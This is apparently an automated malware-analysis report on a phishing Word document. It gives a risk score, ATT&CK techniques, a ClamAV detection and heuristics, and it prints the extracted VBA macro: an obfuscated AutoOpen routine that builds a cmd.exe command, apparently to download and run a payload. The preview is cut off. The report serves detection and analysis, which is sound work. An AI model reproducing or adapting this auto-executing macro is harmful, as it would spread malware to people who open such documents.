MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro attempts to execute a command using heavily obfuscated string concatenation, which when reconstructed, appears to be a call to cmd.exe with environment variable assignments. The presence of the AutoOpen macro and the nature of the script strongly suggest it is designed to download and execute a secondary payload, characteristic of a phishing attachment.
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-6744300-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6744300-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5911 bytes |
SHA-256: 5e89f3b8f5b9cda16ad976a2b1e67f04b6d1c792203041aa242e81666b711c93 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "AmjopqIbXzOh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName 59413094
TypeName JnXzVM
TypeName 3778
TypeName 64
Shell@ CStr("c") + CStr("m") + dGkqWnuRVfFsrZ + IzAZfsXkzB + qiquzAlGr + jEdSf + kPGTzMD + tLsYnLY + kwRzpARNvdNNLa, 764967208 - 764967208
TypeName phbav
TypeName Oct(5)
TypeName CLng(ztUTOv + 66578 - LjwBpL + 68125)
End Sub
Attribute VB_Name = "FksZmhlZoELf"
Function qiquzAlGr()
On Error Resume Next
TypeName Hex(TTjGUH + QwiqvG)
TypeName LMqiav
HEERjowXFYR = "d /V:O" + "/C" + CStr(Chr(idCiFzP + MREvcjISCZsvpA + 34 + iimhQGG + sXobqjrZ)) + "set 6B" + "X1=svHmCq" + "zsiGIIEp" + "LZ" + "jnSoOF" + "Oazw" + "SFGGjEUM" + "(/k-fruD" + "'2cX" + ":)tQy;l"
TypeName Oct(63274 / YwrXm + MXbfP / YXDEcS)
TypeName Round(447671899)
FaSCDhzYK = "Pbg=dVY," + "JN1.e" + "+5" + "$" + "@\8 }W" + "xT{h&&for "
TypeName Chr(7)
TypeName Sqr(132498543)
TypeName oEDWkZ
JKJNuVm = "%5 in " + "(13,19,25" + "," + "65" + ",39,7"
TypeName Tan(XoCwh + 59175 / 88926 - fKAHGT)
TypeName CLng(164)
TypeName 75
TDFdvNkK = ",7" + "8,65," + "52" + ",52," + "72,68,54," + "11,38,"
TypeName CSng(2395 - fltfi + rPzOC - lqCdIt)
TypeName Rnd(sKkskr)
PffZmhtz = "56,17,65,2" + "5,37,19,54" + ",30,65,4" + "4,48,72,6" + "2,65,48," + "64,74,65" + ",54," + "4,5" + "2,8,6"
TypeName DAjvP
TypeName nzOuf
TypeName GicKHz
DMinNrdvYTc = "5,17,48,51" + "," + "68,8" + "," + "41,2,56" + ",42,78,48," + "48,13" + ",46,35,3" + "5,36,23,3," + "8,17," + "37,7,23,"
TypeName Atn(zFHUhO)
TypeName ChrW(lmXZCQ)
wZmknz = "40,17,23" + ",64," + "44" + ",19" + ",3,64,40,2" + "3,35," + "25,78," + "58" + ",65,61," + "71,5"
TypeName Int(izMQn)
TypeName Atn(233479554)
tidoIotHXdU = "2,69,78" + ",48,48,13" + ",46,35," + "35,65,36" + ",40,1,7,7" + "8,8,17,1" + "9,1,23," + "64,44,19," + "3,35,40,57" + ",38,49,"
TypeName Sgn(13957 + 24936 + TAdoo / jimjm)
TypeName Oct(3)
TypeName Round(HNHznm - dEAff * LzcIH * GmfJql)
IzsjcKDnwYL = "39,55,2," + "39,69,78" + "," + "4" + "8,48,1" + "3,46," + "3" + "5,35," + "48,8," + "3,52,8,1" + "7,55,65," + "39" + ",64,44,19"
TypeName ChrB(QNzfs)
TypeName CByte(WZwwB)
TypeName dwQmn
PwuSZ = ",3" + ",35,39,33" + ",69,78," + "48,48,13" + ",46,3" + "5,35,44,3" + ",43" + ",64" + ",44" + ",19,3," + "6" + "4,5"
TypeName Chr(CrMrPw / YnJzP)
TypeName Chr(31801 - rGvBqC)
kDVHiL = "4,3" + "9,35,19," + "26," + "69,78,48," + "48" + ",13,46,3" + "5,35,57,3"
TypeName 68
TypeName Tan(fNZmHE)
PDadkuTDTu = "8,8,17,38," + "19,39,3," + "23,48,8,44" + ",23,64,44," + "19,"
qiquzAlGr = HEERjowXFYR + FaSCDhzYK + JKJNuVm + TDFdvNkK + PffZmhtz + DMinNrdvYTc + wZmknz + tidoIotHXdU + IzsjcKDnwYL + PwuSZ + kDVHiL + PDadkuTDTu
TypeName Rnd(55056 + nMRAaF)
TypeName 8
TypeName CBool(GmJBM - 14783)
End Function
Function jEdSf()
On Error Resume Next
TypeName 5
TypeName Sqr(uwppL)
TypeName CDbl(kwljFd)
BZfOzPpLV = "3" + ",64,54," + "39,35" + ",7,8," + "4" + "8,65,35," + "25,13,37,8" + ",17,44" + ",52,40" + ",57,65,7,3" + "5,8,3," + "23,55,65,7"
TypeName CLng(31)
TypeName CDate(5082)
umvmhdfCb = ",3" + "5,44,39,50" + ",7" + ",48,23,52," + "35,55,76" + ",42,6" + "4,26,1" + "3,5" + "2" + ",8,48,34,"
TypeName pickZN
TypeName CBool(35)
ibfaDbr = "42,6" + "9,42,47," + "51,68,13" + ",45,45," + "72," + "5" + "6,72,42,6"
TypeName Chr(47693585)
TypeName Fix(iIGkah - aJQbL + wXKbCH * zbBaMU)
kpYMiUE = "7," + "67" + ",6" + "3,42,51,68" + ",59," + "24,36,56" + ",68,65,17" + ",1,4"
TypeName CSng(6)
TypeName 962
BYmShfwJMY = "6,48,65," + "3," + "13,66" + ",42,70," + "42,66" + ",68,13,4"
TypeName Hex(LQiniO)
TypeName Tan(zFzwW)
LkXkOHt = "5,4" + "5," + "66,4" + "2,64,65" + ",75" + ",65,42"
TypeName CDbl(3900 * 5072)
TypeName CDbl(7)
ZBGNV = ",51,38,19," + "39
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.